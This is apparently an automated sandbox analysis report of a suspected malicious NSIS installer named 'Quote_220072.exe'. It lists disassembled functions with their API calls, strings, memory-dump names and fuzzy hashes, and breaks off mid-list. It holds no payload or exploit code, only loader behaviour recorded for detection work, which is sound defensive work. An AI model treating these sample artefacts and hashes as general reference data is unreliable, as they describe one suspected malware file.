Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\Quote_220072.exe,C:\Users\user\Desktop\Quote_220072.exe,80000000,00000003), ref: 00403444
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E

Strings

Error launching installer, xrefs: 0040341A
Inst, xrefs: 004034B8
Null, xrefs: 004034CC
C:\Users\user\Desktop\Quote_220072.exe, xrefs: 004033E9, 004033F3, 00403407, 00403424
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033D1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361E
soft, xrefs: 004034C2

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\Desktop\Quote_220072.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3046352727
Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 00405FD5
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 0040604E
lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 004060A8

Strings

Call, xrefs: 00405EBA, 00405F88, 00405FAC, 00405FC1, 00405FD4, 00405FE7, 00406014, 0040604D, 00406054, 00406070, 00406083, 00406091, 004060A1, 004060A7, 004060CE, 004060EA
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406048
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F8D
Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll, xrefs: 00405EF3

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4187626192-1149057156
Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,00000000,?,?), ref: 00405D77
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll), ref: 00405D8F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 0040604E

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll, xrefs: 00405D35, 00405D43, 00405D49, 00405D71, 00405D76, 00405D7E, 00405D88

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll
API String ID: 1759915248-84309663
Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 00403248
MulDiv.KERNEL32(?,00000064,?), ref: 00403278
wsprintfW.USER32 ref: 00403289

Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Strings

... %d%%, xrefs: 00403283
<Py, xrefs: 0040321B

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$<Py
API String ID: 999035486-2352372732
Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

UXTHEME, xrefs: 0040618B
%s%S.dll, xrefs: 004061C9
\, xrefs: 004061A4

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406A50
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406A6B

Strings

a, xrefs: 00406A49
C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
n, xrefs: 00406A42

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-3489432095
Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

UXTHEME, xrefs: 004068C4, 004068D1, 004068DC
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
GetLastError.KERNEL32 ref: 00405E67
SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
GetLastError.KERNEL32 ref: 00405E8E

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
RegCloseKey.KERNELBASE(?), ref: 004069A7

Strings

Call, xrefs: 0040695A

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

Function 00405842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00405852

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

OleUninitialize.OLE32(00000404,00000000), ref: 0040589E

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

Varighedskravs Setup: Installing, xrefs: 00405842

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
